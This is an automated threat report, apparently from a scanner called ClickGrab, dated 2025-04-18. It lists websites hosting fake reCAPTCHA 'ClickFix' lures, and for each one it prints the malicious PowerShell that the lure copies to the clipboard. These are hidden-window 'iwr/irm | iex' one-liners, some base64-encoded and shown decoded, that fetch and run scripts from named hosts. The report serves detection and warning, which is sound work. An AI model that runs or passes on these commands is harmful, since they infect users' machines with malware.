ClickGrab Report: 2025-04-18
Report Summary
Sites Scanned
40
Attacks Detected
155
New Attack Patterns
0
Affected Sites
| Site Domain | Attack Type | Detected Patterns | First Seen |
|---|---|---|---|
| riverview-pools.com | PowerShell Execution | 5 | 2025-04-18 |
| blessdayservices.org | PowerShell Execution | 5 | 2025-04-18 |
| jessespridecharters.com | PowerShell Execution | 5 | 2025-04-18 |
| mail.lucprofessional.com.br | PowerShell Execution | 3 | 2025-04-18 |
| mail.finocci.com | PowerShell Execution | 1 | 2025-04-18 |
| kevinzhangadmin.jintsume.net | PowerShell Execution | 3 | 2025-04-18 |
| cambodiatouristservice.com | PowerShell Execution | 2 | 2025-04-18 |
| admin.gestroom.it | PowerShell Execution | 1 | 2025-04-18 |
| test.peperoncinochepassione.it | PowerShell Execution | 3 | 2025-04-18 |
| first-security-verden.de | PowerShell Execution | 5 | 2025-04-18 |
| lucprofessional.com.br | PowerShell Execution | 3 | 2025-04-18 |
| www.first-security-verden.de | PowerShell Execution | 5 | 2025-04-18 |
| zamilgroups.com | PowerShell Execution | 1 | 2025-04-18 |
| www.laborpartyjo.com | PowerShell Execution | 3 | 2025-04-18 |
| finocci.com | PowerShell Execution | 1 | 2025-04-18 |
| www.amun.jintsume.net | PowerShell Execution | 3 | 2025-04-18 |
| www.finocci.com | PowerShell Execution | 1 | 2025-04-18 |
| www.website.mypetapp.co.za | PowerShell Execution | 3 | 2025-04-18 |
| www.lucprofessional.grupomoltz.com.br | PowerShell Execution | 3 | 2025-04-18 |
| thesignaturemag.salviatech.com | PowerShell Execution | 3 | 2025-04-18 |
| www.bratusferramentas.grupomoltz.com.br | PowerShell Execution | 3 | 2025-04-18 |
| website.mypetapp.co.za | PowerShell Execution | 3 | 2025-04-18 |
| ningbocrm.jintsume.net | PowerShell Execution | 3 | 2025-04-18 |
| horno-rafelet.es | PowerShell Execution | 3 | 2025-04-18 |
| mail.ningbocrm.com | PowerShell Execution | 3 | 2025-04-18 |
| mail.laborpartyjo.com | PowerShell Execution | 3 | 2025-04-18 |
| www.kevinzhangadmin.jintsume.net | PowerShell Execution | 3 | 2025-04-18 |
| bmdcompany.com | PowerShell Execution | 1 | 2025-04-18 |
| www.zamilgroups.com | PowerShell Execution | 1 | 2025-04-18 |
| lucprofessional.grupomoltz.com.br | PowerShell Execution | 3 | 2025-04-18 |
| laborpartyjo.com | PowerShell Execution | 3 | 2025-04-18 |
| www.thesignaturemag.salviatech.com | PowerShell Execution | 3 | 2025-04-18 |
| www.test.peperoncinochepassione.it | PowerShell Execution | 3 | 2025-04-18 |
| mail.cambodiatouristservice.com | PowerShell Execution | 2 | 2025-04-18 |
| www.ningbocrm.jintsume.net | PowerShell Execution | 3 | 2025-04-18 |
| my.salviatech.com | PowerShell Execution | 3 | 2025-04-18 |
| 82.146.62.232 | PowerShell Execution | 3 | 2025-04-18 |
| 101.32.40.22 | PowerShell Execution | 4 | 2025-04-18 |
| staplebrokenmetaliyro.blogspot.com | PowerShell Execution | 46 | 2025-04-18 |
Detailed URL Analysis
https://riverview-pools.com/verify/index.html
Total findings: 5
Indicators of Compromise
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
powershell " + htaPath; iex (irm 'https://aatox.com/verify/45.ps1')
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://riverview-pools.com/verify/index.html",
"Timestamp": "2025-04-18 16:37:57",
"Urls": [
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png",
"https://www.google.com/intl/en/policies/privacy/",
"https://www.google.com/intl/en/policies/terms/",
"https://aatox.com/verify/45.ps1"
],
"PowerShellCommands": [
"powershell \" + htaPath;\r",
"iex (irm 'https://aatox.com/verify/45.ps1')"
],
"SuspiciousKeywords": [
"Command \\\"iex (irm 'https://aatox.com/verify/45.ps1')\\\"\";\r",
"\u2705",
"I am not a robot",
"Verification Hash",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": [
{
"FullMatch": "'https://aatox.com/verify/45.ps1'",
"URL": "https://aatox.com/verify/45.ps1",
"Context": "...nst htaPath = \"-NoP -WindowStyle Hidden -Command \\\"iex (irm 'https://aatox.com/verify/45.ps1')\\\"\"; const commandToRun = \"powershell \" + htaP...",
"DownloadedFile": "D:\\a\\ClickGrab\\ClickGrab\\ClickFix_Output_20250418_163757\\Downloads\\riverview-pools.com_20250418_163757_45.ps1"
},
{
"FullMatch": "const htaPath = \"-NoP -WindowStyle Hidden -Command \\\"",
"URL": "N/A (File Path)",
"HTAPath": "-NoP -WindowStyle Hidden -Command \\",
"Context": "...).textContent = verification_id; const htaPath = \"-NoP -WindowStyle Hidden -Command \\\"iex (irm 'https://aatox.com/verify/45.ps1')\\\"\";..."
},
{
"FullMatch": "const htaPath = \"-NoP -WindowStyle Hidden -Command \\\"iex (irm 'https://aatox.com/verify/45.ps1'",
"URL": "N/A (File Path)",
"HTAPath": "-NoP -WindowStyle Hidden -Command \\\"iex (irm 'https://aatox.com/verify/45.ps1",
"Context": "...).textContent = verification_id; const htaPath = \"-NoP -WindowStyle Hidden -Command \\\"iex (irm 'https://aatox.com/verify/45.ps1')\\\"\"; const commandToRun = \"powershell \" + htaP..."
}
]
}
https://blessdayservices.org/up/
Total findings: 5
Indicators of Compromise
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\""; powershell " + htaPath;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://blessdayservices.org/up/",
"Timestamp": "2025-04-18 16:37:59",
"Urls": [
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png",
"https://www.google.com/intl/en/policies/privacy/",
"https://www.google.com/intl/en/policies/terms/",
"https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1"
],
"PowerShellCommands": [
"powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\\\"\";",
"powershell \" + htaPath;"
],
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification Hash",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...dy.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextAr..."
],
"PowerShellDownloads": [
{
"FullMatch": "iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex",
"URL": "https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1",
"Context": "...n -c \\\"Start-Process powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\\\"\"; const commandToRun = \"..."
},
{
"FullMatch": "| iex",
"URL": null,
"Context": "...https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\\\"\"; const commandToRun = \"..."
},
{
"FullMatch": "https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1",
"URL": "https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1",
"Context": "...\\\"Start-Process powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\\\"\"; const commandToR..."
},
{
"FullMatch": "const htaPath = \"-w hidden -c \\\"",
"URL": "N/A (File Path)",
"HTAPath": "-w hidden -c \\",
"Context": "...d').textContent = verification_id; const htaPath = \"-w hidden -c \\\"Start-Process powershell -ArgumentList '-w hidden -c iwr htt..."
}
]
}
https://jessespridecharters.com/v/
Total findings: 5
Indicators of Compromise
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
powershell " + htaPath;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://jessespridecharters.com/v/",
"Timestamp": "2025-04-18 16:38:01",
"Urls": [
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png",
"https://www.google.com/intl/en/policies/privacy/",
"https://www.google.com/intl/en/policies/terms/",
"https://yogasitesdev.wpengine.com/2/15.ps1"
],
"PowerShellCommands": "powershell \" + htaPath;",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification Hash",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...dy.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextAr..."
],
"PowerShellDownloads": [
{
"FullMatch": "iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex",
"URL": "https://yogasitesdev.wpengine.com/2/15.ps1",
"Context": "...d; const htaPath = \"-w hidden -c \\\"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\\\"\"; const commandToRun = \"powershell \" + htaPat..."
},
{
"FullMatch": "| iex",
"URL": null,
"Context": "...idden -c \\\"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\\\"\"; const commandToRun = \"powershell \" + htaPat..."
},
{
"FullMatch": "'https://yogasitesdev.wpengine.com/2/15.ps1'",
"URL": "https://yogasitesdev.wpengine.com/2/15.ps1",
"Context": "...const htaPath = \"-w hidden -c \\\"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\\\"\"; const commandToRun = \"powershell \" +..."
},
{
"FullMatch": "const htaPath = \"-w hidden -c \\\"",
"URL": "N/A (File Path)",
"HTAPath": "-w hidden -c \\",
"Context": "...d').textContent = verification_id; const htaPath = \"-w hidden -c \\\"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\\\"\";..."
},
{
"FullMatch": "const htaPath = \"-w hidden -c \\\"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1'",
"URL": "N/A (File Path)",
"HTAPath": "-w hidden -c \\\"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1",
"Context": "...d').textContent = verification_id; const htaPath = \"-w hidden -c \\\"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\\\"\"; const commandToRun = \"powershell \" +..."
}
]
}
https://mail.lucprofessional.com.br/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://mail.lucprofessional.com.br/",
"Timestamp": "2025-04-18 16:38:02",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://mail.finocci.com/
Total findings: 1
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"Url": "https://mail.finocci.com/",
"Timestamp": "2025-04-18 16:38:03",
"Urls": "https://t.me/LearnUSDT_bot?start=540835569"
}
https://kevinzhangadmin.jintsume.net/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://kevinzhangadmin.jintsume.net/",
"Timestamp": "2025-04-18 16:38:03",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://cambodiatouristservice.com/
Total findings: 2
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://browser.certif-update.website/ |
| URL | https://browser.certif-update.website/ |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"Url": "https://cambodiatouristservice.com/",
"Timestamp": "2025-04-18 16:38:04",
"Urls": [
"https://browser.certif-update.website/",
"https://browser.certif-update.website/"
]
}
https://admin.gestroom.it/
Total findings: 1
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"Url": "https://admin.gestroom.it/",
"Timestamp": "2025-04-18 16:38:05",
"Urls": "https://t.me/LearnUSDT_bot?start=540835569"
}
https://test.peperoncinochepassione.it/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://test.peperoncinochepassione.it/",
"Timestamp": "2025-04-18 16:38:06",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=",
"Decoded": "iex (iwr 'https://nicostudio.it/pZJHqter.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://first-security-verden.de/
Total findings: 5
Indicators of Compromise
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"Url": "https://first-security-verden.de/",
"Timestamp": "2025-04-18 16:38:07",
"Urls": [
"https://www.webgo.de/assets/images/misc/hazard-50x50.png",
"https://www.webgo.de/assets/images/misc/hazard-50x50.png",
"https://www.webgo.de/assets/images/logo.svg",
"https://www.webgo.de/assets/images/misc/construction.png",
"https://www.webgo.de/webhosting/"
]
}
https://lucprofessional.com.br/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://lucprofessional.com.br/",
"Timestamp": "2025-04-18 16:38:07",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://www.first-security-verden.de/
Total findings: 5
Indicators of Compromise
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"Url": "https://www.first-security-verden.de/",
"Timestamp": "2025-04-18 16:38:08",
"Urls": [
"https://www.webgo.de/assets/images/misc/hazard-50x50.png",
"https://www.webgo.de/assets/images/misc/hazard-50x50.png",
"https://www.webgo.de/assets/images/logo.svg",
"https://www.webgo.de/assets/images/misc/construction.png",
"https://www.webgo.de/webhosting/"
]
}
https://zamilgroups.com/
Total findings: 1
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"Url": "https://zamilgroups.com/",
"Timestamp": "2025-04-18 16:38:08",
"Urls": "https://t.me/LearnUSDT_bot?start=540835569"
}
https://www.laborpartyjo.com/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://www.laborpartyjo.com/",
"Timestamp": "2025-04-18 16:38:09",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://finocci.com/
Total findings: 1
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"Url": "https://finocci.com/",
"Timestamp": "2025-04-18 16:38:09",
"Urls": "https://t.me/LearnUSDT_bot?start=540835569"
}
https://www.amun.jintsume.net/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://www.amun.jintsume.net/",
"Timestamp": "2025-04-18 16:38:10",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
}
}
https://www.finocci.com/
Total findings: 1
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"Url": "https://www.finocci.com/",
"Timestamp": "2025-04-18 16:38:10",
"Urls": "https://t.me/LearnUSDT_bot?start=540835569"
}
https://www.website.mypetapp.co.za/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"Url": "https://www.website.mypetapp.co.za/",
"Timestamp": "2025-04-18 16:38:11",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"Urls": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
